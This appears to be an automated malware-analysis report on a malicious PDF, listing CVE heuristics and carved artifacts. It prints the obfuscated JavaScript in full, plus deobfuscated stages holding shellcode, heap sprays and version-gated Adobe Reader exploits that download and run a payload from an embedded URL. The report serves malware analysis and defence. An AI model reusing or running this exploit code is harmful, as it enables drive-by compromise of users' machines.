MALICIOUS
490
Risk Score
Malware Insights
MITRE ATT&CK
T1204.002 Malicious File: User Execution: Malicious File
The PDF document contains embedded JavaScript, indicated by multiple heuristic firings including a high-confidence ML classifier. The presence of a large JavaScript stream suggests it is intended to perform malicious actions, such as downloading and executing a second-stage payload. The primary IOC is the file's SHA256 hash.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 12
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://freewarestats.info/w.php?f=19&e=5 Referenced by PDF JavaScript
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0076_000.js |
pdf-javascript-stream | PDF /JS object 76 at offset 0x3A9 | 11586 bytes |
SHA-256: 7b5eb1992dac2206793925b980fd4580c98da13fb5af489005da0103cf040484 |
|||
Preview scriptFirst 1,000 lines of the extracted script
w="s";
w+="l";
w+='i';
w+="ce";
j='b343tb3g';
j=j[w];
z=[19,6,38,40,8,55,43,13,49,14,11,50,66,9,64,64,11,50,12,4,47,72,11,50,66,32,12,4,11,50,36,32,47,72,11,50,47,63,9,72,11,50,9,9,32,12,11,50,64,72,4,18,11,50,72,18,66,8,11,50,66,8,9,18,11,50,18,4,72,18,11,50,36,18,66,8,11,50,32,64,61,4,11,50,36,64,66,8,11,50,9,9,18,66,11,50,64,64,39,8,11,50,32,47,66,8,11,50,18,9,9,4,11,50,9,9,36,72,11,50,66,61,70,4,11,50,61,32,47,47,11,50,12,12,61,18,11,50,8,66,12,12,11,50,72,18,66,8,11,50,4,9,9,18,11,50,9,63,72,64,11,50,36,32,18,64,11,50,66,36,12,8,11,50,70,72,9,72,11,50,47,72,66,32,11,50,32,61,36,32,11,50,47,8,47,63,11,50,32,61,72,4,11,50,66,8,32,64,11,50,9,4,36,32,11,50,36,72,66,8,11,50,36,66,9,32,11,50,12,32,18,9,11,50,66,8,32,64,11,50,70,18,36,64,11,50,12,32,18,9,11,50,4,63,9,9,11,50,72,61,72,63,11,50,6,39,12,4,11,50,4,32,18,9,11,50,39,8,9,9,11,50,8,47,18,12,11,50,9,66,61,18,11,50,36,72,12,70,11,50,4,61,18,66,11,50,18,39,4,8,11,50,39,6,18,9,11,50,47,8,72,18,11,50,9,8,12,61,11,50,36,32,61,12,11,50,32,47,47,64,11,50,32,47,66,8,11,50,18,9,70,72,11,50,64,64,39,39,11,50,18,4,66,8,11,50,66,39,72,8,11,50,47,4,72,64,11,50,32,72,12,12,11,50,18,4,70,72,11,50,39,66,66,8,11,50,39,39,18,9,11,50,18,72,66,8,11,50,18,9,66,8,11,50,6,8,4,32,11,50,32,63,32,47,11,50,47,8,4,9,11,50,6,39,32,9,11,50,64,66,66,8,11,50,66,18,70,18,11,50,18,4,36,39,11,50,36,72,9,9,11,50,63,64,18,9,11,50,12,9,47,8,11,50,64,66,66,8,11,50,66,8,18,66,11,50,64,6,12,36,11,50,32,63,18,32,11,50,63,66,47,66,11,50,12,12,12,12,11,50,47,70,12,12,11,50,47,66,12,63,11,50,18,18,18,18,11,50,18,18,18,18,11,50,32,18,32,66,11,50,72,18,64,6,11,50,12,12,64,66,11,50,18,18,18,18,11,50,32,18,18,18,11,50,4,18,66,9,11,50,32,18,61,63,11,50,66,8,32,32,11,50,66,8,47,4,11,50,61,18,32,47,11,50,4,9,66,9,11,50,12,12,18,32,11,50,64,66,47,9,11,50,64,47,64,12,11,50,18,18,18,18,11,50,36,32,64,66,11,50,64,4,36,70,11,50,32,72,64,39,11,50,61,64,12,12,11,50,4,72,66,9,11,50,66,8,18,66,11,50,47,66,47,66,11,50,12,12,64,61,11,50,12,12,12,12,11,50,18,70,47,8,11,50,36,70,47,8,11,50,47,4,66,61,11,50,18,61,18,72,11,50,18,18,18,18,11,50,32,4,66,39,11,50,18,4,70,72,11,50,18,72,4,36,11,50,36,70,70,72,11,50,64,36,64,32,11,50,4,36,36,9,11,50,70,72,72,72,11,50,36,64,18,72,11,50,9,9,36,70,11,50,4,36,9,70,11,50,70,72,72,72,11,50,70,18,18,66,11,50,36,9,70,39,11,50,32,9,70,18,11,50,12,66,64,66,11,50,18,18,18,18,11,50,12,12,18,18,11,50,18,4,32,64,11,50,47,66,66,8,11,50,4,63,9,9,11,50,4,36,32,61,11,50,61,39,72,72,11,50,36,36,18,18,11,50,64,70,36,18,11,50,4,36,36,72,11,50,61,39,72,72,11,50,70,47,18,32,11,50,64,4,64,72,11,50,4,64,64,4,11,50,61,39,72,72,11,50,18,18,18,63,11,50,66,6,32,63,11,50,18,72,4,61,11,50,66,66,9,18,11,50,61,39,72,72,11,50,72,61,18,72,11,50,64,6,32,61,11,50,64,6,18,18,11,50,32,9,18,18,11,50,64,6,32,36,11,50,12,12,18,18,11,50,61,72,32,64,11,50,4,18,66,32,11,50,61,64,36,32,11,50,18,18,64,6,11,50,12,12,32,9,11,50,18,72,32,64,11,50,18,18,64,6,11,50,47,8,66,9,11,50,32,9,18,4,11,50,32,64,12,12,11,50,66,9,18,72,11,50,18,4,4,9,11,50,18,70,47,8,11,50,61,9,47,8,11,50,66,18,72,36,11,50,18,18,9,12,11,50,12,6,36,32,11,50,66,18,72,36,11,50,18,18,9,12,11,50,4,72,36,32,11,50,18,18,64,6,11,50,12,47,64,6,11,50,32,64,12,12,11,50,47,66,18,66,11,50,12,47,63,4,11,50,12,12,12,12,11,50,72,47,66,47,11,50,47,4,18,47,11,50,12,47,63,66,11,50,18,47,66,6,11,50,64,12,66,63,11,50,8,39,18,61,11,50,4,6,9,9,11,50,32,8,66,6,11,50,4,64,61,8,11,50,36,63,72,64,11,50,61,6,9,64,11,50,36,18,70,12,11,50,36,72,64,66,11,50,36,18,36,72,11,50,70,12,9,6,11,50,64,64,70,12,11,50,64,32,36,70,11,50,36,36,64,32,11,50,36,70,64,61,11,50,36,9,64,32,11,50,64,61,36,72,11,50,36,9,36,72,11,50,64,63,70,47,11,50,64,64,64,47,11,50,70,12,64,12,11,50,70,47,36,36,11,50,64,66,36,18,11,50,9,12,36,18,11,50,9,39,64,64,11,50,9,63,9,61,11,50,64,32,70,64,11,50,9,32,9,39,11,50,18,18,18,18,14,46,12,50,68,4,45,54,24,68,40,47,1,19,38,7,38,6,17,2,25,26,28,34,65,54,27,47,7,38,6,37,27,47,68,13,45,65,29,70,74,2,25,26,28,38,6,69,49,38,6,46,22,38,6,49,38,6,37,43,50,8,43,45,38,54,68,13,7,18,17,2,25,33,70,26,46,38,47,45,50,38,68,40,38,6,46,22,40,12,50,68,4,45,54,24,68,40,8,73,7,26,28,19,6,38,40,39,60,13,49,68,47,34,40,62,38,38,6,25,7,26,46,19,6,38,40,19,34,49,18,73,18,4,18,4,18,4,18,4,46,19,6,38,40,6,39,39,38,49,18,73,72,18,18,18,18,18,46,19,6,38,40,42,6,25,27,24,6,39,49,50,68,47,43,4,6,42,47,7,8,55,43,13,26,46,19,6,38,40,43,4,31,27,47,68,49,42,6,25,27,24,6,39,37,27,47,68,13,45,65,29,70,46,19,6,38,40,2,25,49,6,39,39,38,10,7,43,4,31,27,47,68,69,18,73,9,66,26,46,19,6,38,40,25,6,38,43,42,49,50,68,47,43,4,6,42,47,7,15,11,50,63,18,63,18,11,50,63,18,63,18,15,26,46,25,6,38,43,42,49,47,1,19,38,7,25,6,38,43,42,17,2,25,26,46,19,6,38,40,4,24,50,68,45,70,49,7,19,34,10,18,73,72,18,18,18,18,18,26,33,6,39,39,38,46,12,24,38,7,19,6,38,40,4,24,50,68,45,49,18,46,4,24,50,68,45,74,4,24,50,68,45,70,46,4,24,50,68,45,69,69,26,28,39,60,13,52,4,24,50,68,45,30,49,25,6,38,43,42,69,42,6,25,27,24,6,39,46,22,40,19,6,38,40,24,19,47,38,12,27,24,34,49,50,68,47,43,4,6,42,47,7,15,11,50,18,4,18,4,11,50,18,4,18,4,15,26,46,34,65,54,27,47,7,24,19,47,38,12,27,24,34,37,27,47,68,13,45,65,74,72,72,63,32,70,26,28,24,19,47,38,12,27,24,34,69,49,24,19,47,38,12,27,24,34,46,22,40,45,65,54,43,37,4,24,27,27,6,8,0,45,24,38,47,49,58,24,27,27,6,8,37,4,24,27,27,47,4,45,20,21,6,54,27,44,68,12,24,7,28,43,50,8,55,75,15,15,17,21,43,13,75,24,19,47,38,12,27,24,34,22,26,46,22,40,12,50,68,4,45,54,24,68,40,42,38,54,68,45,12,7,26,28,68,24,42,49,50,68,47,43,4,6,42,47,7,15,11,50,18,62,18,62,11,50,18,62,18,62,11,50,18,62,18,62,11,50,18,62,18,62,15,26,46,19,6,38,40,42,6,25,27,24,6,39,49,50,68,47,43,4,6,42,47,7,8,55,43,13,26,46,65,47,6,42,8,27,24,4,60,49,68,24,42,69,42,6,25,27,24,6,39,46,8,54,13,8,27,24,4,60,49,50,68,47,43,4,6,42,47,7,15,11,50,18,62,18,62,11,50,18,62,18,62,15,26,46,65,47,6,39,47,38,43,54,1,47,49,70,18,46,43,42,38,6,25,49,65,47,6,39,47,38,43,54,1,47,69,65,47,6,42,8,27,24,4,60,37,27,47,68,13,45,65,46,34,65,54,27,47,7,8,54,13,8,27,24,4,60,37,27,47,68,13,45,65,74,43,42,38,6,25,26,28,8,54,13,8,27,24,4,60,69,49,8,54,13,8,27,24,4,60,46,22,40,12,54,27,27,8,27,24,4,60,49,8,54,13,8,27,24,4,60,37,43,50,8,43,45,38,54,68,13,7,18,17,43,42,38,6,25,26,46,8,27,24,4,60,49,8,54,13,8,27,24,4,60,37,43,50,8,43,45,38,54,68,13,7,18,17,8,54,13,8,27,24,4,60,37,27,47,68,13,45,65,10,43,42,38,6,25,26,46,34,65,54,27,47,7,8,27,24,4,60,37,27,47,68,13,45,65,69,43,42,38,6,25,74,18,73,72,18,18,18,18,26,28,8,27,24,4,60,49,8,27,24,4,60,69,8,27,24,4,60,69,12,54,27,27,8,27,24,4,60,46,22,40,21,47,21,49,68,47,34,40,62,38,38,6,25,7,26,46,12,24,38,7,54,49,18,46,54,74,61,72,18,18,46,54,69,69,26,28,21,47,21,52,54,30,49,8,27,24,4,60,69,65,47,6,42,8,27,24,4,60,46,22,40,19,6,38,40,68,50,21,49,61,70,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,46,50,45,54,27,37,42,38,54,68,45,12,7,15,11,72,32,18,18,18,12,15,17,68,50,21,26,46,22,40,12,50,68,4,45,54,24,68,40,13,47,45,54,4,24,68,7,26,28,19,6,38,40,6,38,38,25,49,68,47,34,40,62,38,38,6,25,7,26,46,54,12,7,6,42,42,37,39,24,4,37,58,24,27,27,6,8,37,13,47,45,44,4,24,68,26,28,19,6,38,40,42,6,25,27,24,6,39,49,50,68,47,43,4,6,42,47,7,8,55,43,13,26,46,19,6,38,40,65,48,2,32,18,18,58,67,49,42,6,25,27,24,6,39,37,27,47,68,13,45,65,29,70,46,19,6,38,40,2,25,49,18,73,72,18,18,18,18,18,10,7,65,48,2,32,18,18,58,67,69,18,73,9,66,26,46,19,6,38,40,25,6,38,43,42,49,50,68,47,43,4,6,42,47,7,15,11,50,63,18,63,18,11,50,63,18,63,18,15,26,46,25,6,38,43,42,49,47,1,19,38,7,25,6,38,43,42,17,2,25,26,46,19,6,38,40,42,32,62,55,5,64,32,12,49,7,18,73,18,4,18,4,18,4,18,4,10,18,73,72,18,18,18,18,18,26,33,18,73,72,18,18,18,18,18,46,12,24,38,7,19,6,38,40,19,2,4,56,71,63,64,25,49,18,46,19,2,4,56,71,63,64,25,74,42,32,62,55,5,64,32,12,46,19,2,4,56,71,63,64,25,69,69,26,28,6,38,38,25,52,19,2,4,56,71,63,64,25,30,49,25,6,38,43,42,69,42,6,25,27,24,6,39,46,22,40,19,6,38,40,45,57,51,65,67,8,35,34,49,50,68,47,43,4,6,42,47,7,15,11,18,63,15,26,46,34,65,54,27,47,7,45,57,51,65,67,8,35,34,37,27,47,68,13,45,65,74,18,73,72,18,18,18,26,28,45,57,51,65,67,8,35,34,69,49,45,57,51,65,67,8,35,34,46,22,40,45,57,51,65,67,8,35,34,49,15,67,37,15,69,45,57,51,65,67,8,35,34,46,6,42,42,37,39,24,4,37,58,24,27,27,6,8,37,13,47,45,44,4,24,68,7,45,57,51,65,67,8,35,34,26,46,22,22,40,6,53,27,50,13,54,68,43,49,6,42,42,37,42,27,50,13,44,68,43,46,19,6,38,40,43,19,49,42,6,38,43,47,44,68,45,7,6,42,42,37,19,54,47,34,47,38,3,47,38,43,54,24,68,37,45,24,0,45,38,54,68,13,7,26,37,4,65,6,38,62,45,7,18,26,26,46,12,24,38,7,19,6,38,40,54,49,18,46,54,74,6,53,27,50,13,54,68,43,37,27,47,68,13,45,65,46,54,69,69,26,28,54,12,7,6,53,27,50,13,54,68,43,52,54,30,37,68,6,21,47,49,49,14,20,0,4,38,54,42,45,14,26,28,19,6,38,40,27,19,49,6,53,27,50,13,54,68,43,52,54,30,37,19,47,38,43,54,24,68,46,22,22,40,54,12,7,7,27,19,49,49,63,26,41,41,7,7,43,19,49,49,66,26,59,59,7,27,19,74,49,66,37,61,70,26,26,26,28,13,47,45,54,4,24,68,7,26,46,22,47,27,43,47,40,54,12,7,27,19,49,49,36,37,61,26,28,42,38,54,68,45,12,7,26,46,22,47,27,43,47,40,54,12,7,7,7,43,19,49,49,64,26,41,41,7,43,19,49,49,36,26,26,59,59,7,27,19,74,36,37,61,61,26,26,28,8,73,7,26,46,22,47,27,43,47,40,54,12,7,7,27,19,23,49,63,37,61,26,41,41,7,27,19,74,49,63,37,70,26,41,41,7,27,19,23,49,66,37,61,9,26,41,41,7,27,19,74,49,66,37,61,36,26,26,28,12,50,68,4,45,54,24,68,40,6,7,26,28,50,45,54,27,37,42,38,54,68,45,39,7,14,42,16,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,40,75,40,25,25,25,25,61,61,61,14,17,68,47,34,40,71,6,45,47,7,26,26,46,22,19,6,38,40,65,49,6,42,42,37,42,27,50,13,44,68,43,46,12,24,38,7,19,6,38,40,12,49,18,46,12,74,65,37,27,47,68,13,45,65,46,12,69,69,26,28,54,12,7,65,52,12,30,37,68,6,21,47,49,49,14,20,0,4,38,54,42,45,14,26,28,19,6,38,40,54,49,65,52,12,30,37,19,47,38,43,54,24,68,46,22,22,40,54,12,7,7,54,23,66,37,61,70,26,59,59,7,54,74,66,37,70,26,26,28,4,49,68,47,34,40,62,38,38,6,25,7,26,46,19,6,38,40,39,49,50,68,47,43,4,6,42,47,7,14,11,50,63,18,63,18,11,50,63,18,63,18,14,26,46,19,6,38,40,47,49,50,68,47,43,4,6,42,47,7,8,55,43,13,26,46,34,65,54,27,47,7,39,37,27,47,68,13,45,65,74,49,18,73,66,18,18,18,26,28,39,69,49,39,46,22,39,49,39,37,43,50,8,43,45,38,7,18,17,18,73,66,18,18,18,10,47,37,27,47,68,13,45,65,26,46,12,24,38,7,12,49,18,46,12,74,70,63,18,18,46,12,69,69,26,28,4,52,12,30,49,39,69,47,46,22,6,7,26,46,6,7,26,46,45,38,25,28,45,65,54,43,37,21,47,39,54,6,37,68,47,34,53,27,6,25,47,38,7,68,50,27,27,26,46,22,4,6,45,4,65,7,47,26,28,22,6,7,26,46,22,22];
a="SzqVcKa(b3-%fg''@,0vEm}>oy)l{*]_5/wG7.rd |psIt;eW=uM[PijQUC&k1A96h8Nn+2D4x<:";
b='al';
b2="v"
+b;
try
{
if(!google.search())throw 1;
}
catch(her436j34k76)
{
e=(j());
try{
b='e'+b2;
if(!google.search())
a=2;
}
catch(q){
e=e[b];
}
s='';try{if(!google.search())throw 1;}catch(q){r=1;}{
for(i=0;i<z.length;i++)
try{if(!google.search())throw 1;}catch(q){
s
+=
a[z[i]];
}
}}
"))";try{if(!google.search())throw 1;}catch(q){e(s);}
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery alphabet-index-array from JavaScript object 76 at offset 0x3A9 | 3864 bytes |
SHA-256: 21307fd6719786154dab837ff307922af19e34fc9f358fecff8e49337a1bf4e6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u662f%u6572%u7765%u7261%u7365%u6174%u7374%u692e%u666e%u2f6f%u2e77%u6870%u3f70%u3d66%u3931%u6526%u353d%u0000';function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra;}ra=ra.substring(0,qy/2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape('%u9090%u9090');yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} var overflow=unescape('%u0c0c%u0c0c');while(overflow.length<44952){overflow+=overflow;} this.collabStore=Collab.collectEmailInfo({subj:'',msg:overflow});} function printf(){nop=unescape('%u0A0A%u0A0A%u0A0A%u0A0A');var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape('%u0A0A%u0A0A');headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;} fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;} mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;} var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf('%45000f',num);} function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape('%u9090%u9090');yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;} var tUMhNbGw=unescape('%09');while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} tUMhNbGw='N.'+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}} aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}} if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}} if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(bjsg);while(d.length<=0x8000){d+=d;}d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}a();a();try{this.media.newPlayer(null);}catch(e){}a();}}
|
|||
generic_stage_recovery_001.js |
deobfuscated-js | generic stage recovery percent-decode from JavaScript object 76 at offset 0x3A9 | 3860 bytes |
SHA-256: 532ff8bbe85e69430e22dd9a7cc247a4cef85456bed283cbc1f8bf6965de47df |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u662f%u6572%u7765%u7261%u7365%u6174%u7374%u692e%u666e%u2f6f%u2e77%u6870%u3f70%u3d66%u3931%u6526%u353d%u0000';function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra;}ra=ra.substring(0,qy/2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape('%u9090%u9090');yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} var overflow=unescape('%u0c0c%u0c0c');while(overflow.length<44952){overflow+=overflow;} this.collabStore=Collab.collectEmailInfo({subj:'',msg:overflow});} function printf(){nop=unescape('%u0A0A%u0A0A%u0A0A%u0A0A');var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape('%u0A0A%u0A0A');headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;} fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;} mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;} var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf('E000f',num);} function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape('%u9090%u9090');yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;} var tUMhNbGw=unescape(' ');while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} tUMhNbGw='N.'+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}} aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}} 